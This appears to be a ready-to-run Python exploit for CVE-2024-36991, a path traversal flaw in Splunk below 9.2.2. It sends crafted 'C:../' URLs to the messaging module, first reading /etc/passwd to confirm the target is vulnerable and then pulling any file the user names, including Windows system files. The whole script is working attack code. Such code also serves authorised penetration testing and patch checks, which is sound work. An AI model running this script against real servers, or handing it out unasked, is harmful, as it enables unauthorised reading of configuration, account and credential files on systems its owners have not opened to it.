#!/usr/bin/python3

"""
CVE-2024-36991 - Path Traversal Splunk below v9.2.2
Original code: https://github.com/bigb0x/CVE-2024-36991
"""

import requests
import argparse
import urllib3
from sys import exit as sys_exit
from sys import argv as sys_argv 


urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


# Define color dictionary
color = {
    "RESET": '\033[0m',
    "RED": '\033[91m',
    "GREEN": '\033[92m',
    "YELLOW": '\033[93m',
    "BLUE": '\033[94m',
    "MAGENTA": '\033[95m',
    "CYAN": '\033[96m',
    "WHITE": '\033[97m'
}


# Define some pretty characters
STAR: str = f"{color['YELLOW']}[{color['BLUE']}*{color['YELLOW']}]{color['RESET']}"
WARNING_STR: str = f"{color['RED']}[{color['YELLOW']}!{color['RED']}]{color['RESET']}"


# Ctrl+C
def signal_handler(sig, frame)->None:
    print(f"\n{WARNING_STR} {color['RED']}Ctrl+C! Exiting...{color['RESET']}")
    sys_exit(1)


def parse_arguments():
    """
    Get arguments from user
    """
    epilog_examples: str = f"{STAR} Examples\n\nRead Splunk files: python3 {sys_argv[0]} -u 'http://example.com:8000' -f '/etc/passwd'\nRead system files: python3 {sys_argv[0]} -u 'http://example.com:8000' --system-files -f '/Windows/System32/drivers/etc/hosts'"
    parser = argparse.ArgumentParser(description="CVE-2024-36991 - Path Traversal for Splunk versions below 9.2.2.", 
                                     epilog=epilog_examples, formatter_class=argparse.RawTextHelpFormatter)

    # Add arguments with flags
    parser.add_argument("-u", "--url", type=str, help="Name of the user", required=True)
    parser.add_argument("-f", "--file-to-read", type=str, help="File to read in Splunk configuration (absolute path, such as '/etc/passwd').", required=True)
    parser.add_argument("-l", "--language", type=str, help="Language set for Splunk ('en_us' for US english, 'jp_jp' for japanese and so on). Default='en_us'",
                        default='en_us')
    parser.add_argument("--system-files", action="store_true", help="Attempt to read system files instead of Splunk config files.")
    # Parse the arguments
    args = parser.parse_args()
    # Return the parsed arguments
    return args


def print_target_info(args: argparse.Namespace)->None:
    """
    Print info about the target
    """
    n_print: int = 70
    print(f"\n{color['BLUE']}{n_print * '='}{color['RESET']}")
    print(f"{color['RED']}    CVE-2024-36991{color['RESET']}\n")
    print(f"{STAR}{color['BLUE']} Target URL:   {color['YELLOW']}{args.url}{color['RESET']}")
    if args.system_files:
        print(f"{STAR}{color['BLUE']} File to read: {color['YELLOW']}{args.file_to_read} {color['RED']}(System file){color['RESET']}")
    else:    
        print(f"{STAR}{color['BLUE']} File to read: {color['YELLOW']}{args.file_to_read}{color['RESET']}")
    print(f"{STAR}{color['BLUE']} Language:     {color['YELLOW']}{args.language}{color['RESET']}")
    print(f"{color['BLUE']}{n_print * '='}{color['RESET']}\n")


def make_request(url)->str|None:
    """
    Check if request for Path Traversal is available
    """
    try:
        response = requests.get(url, verify=False)
        if response.status_code == 200:
            return response.text
        else:
            return None
    except Exception as e:
        print(f"An error ocurred:\n\n{e}")
        return None


def check_if_target_is_vulnerable(args: argparse.Namespace)->None:
    """
    Check if the target is vulnerable to CVE-2024-36991
    """
    # Check '/etc/passwd' file from Splunk configuration
    vuln_url: str = f"{args.url}/{args.language}/modules/messaging/C:../C:../C:../C:../C:../etc/passwd"
    check_request: str | None = make_request(vuln_url)
    # Check if we were able to extract content from the target
    if check_request is not None and 'admin:' in check_request:
        print(f"{STAR}{color['GREEN']} Target seems to be vulnerable!{color['RESET']}")
        return
    print(f"{WARNING_STR}{color['RED']}Target apparently is not vulnerable{color['RESET']}")
    sys_exit(1)


def exploit(args: argparse.Namespace)->None:
    """
    Attempt to Splunk files abusing CVE-2024-36991
    """
    # Set path to read file
    if args.system_files:
        path_traversal: str = "C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:.."
    else:
        path_traversal: str = "C:../C:../C:../C:../C:.."
    vuln_path: str = f"{args.url}/{args.language}/modules/messaging/{path_traversal}{args.file_to_read}"
    # Make an HTTP request to read this file
    malicious_req = make_request(vuln_path)
    # Check if we were able to extract content from the target
    if malicious_req is not None:
        print(f"{STAR}{color['GREEN']} Content extracted:\n\n{color['RESET']}{malicious_req}")
        return
    print(f"{WARNING_STR} {color['RED']}Unable to extract content from {color['YELLOW']}{args.file_to_read}{color['RED']} file.{color['RESET']}")
    sys_exit(1)


# Main
def main()->None:
    # Get Arguments from user
    args: argparse.Namespace = parse_arguments()
    # Print target info provided
    print_target_info(args)
    # Check if target is vulnerable attempting to read '/etc/passwd'
    check_if_target_is_vulnerable(args)
    # If it is vulnerable, attempt to read a file requested by the user
    exploit(args)

    
if __name__ == '__main__':
    main()
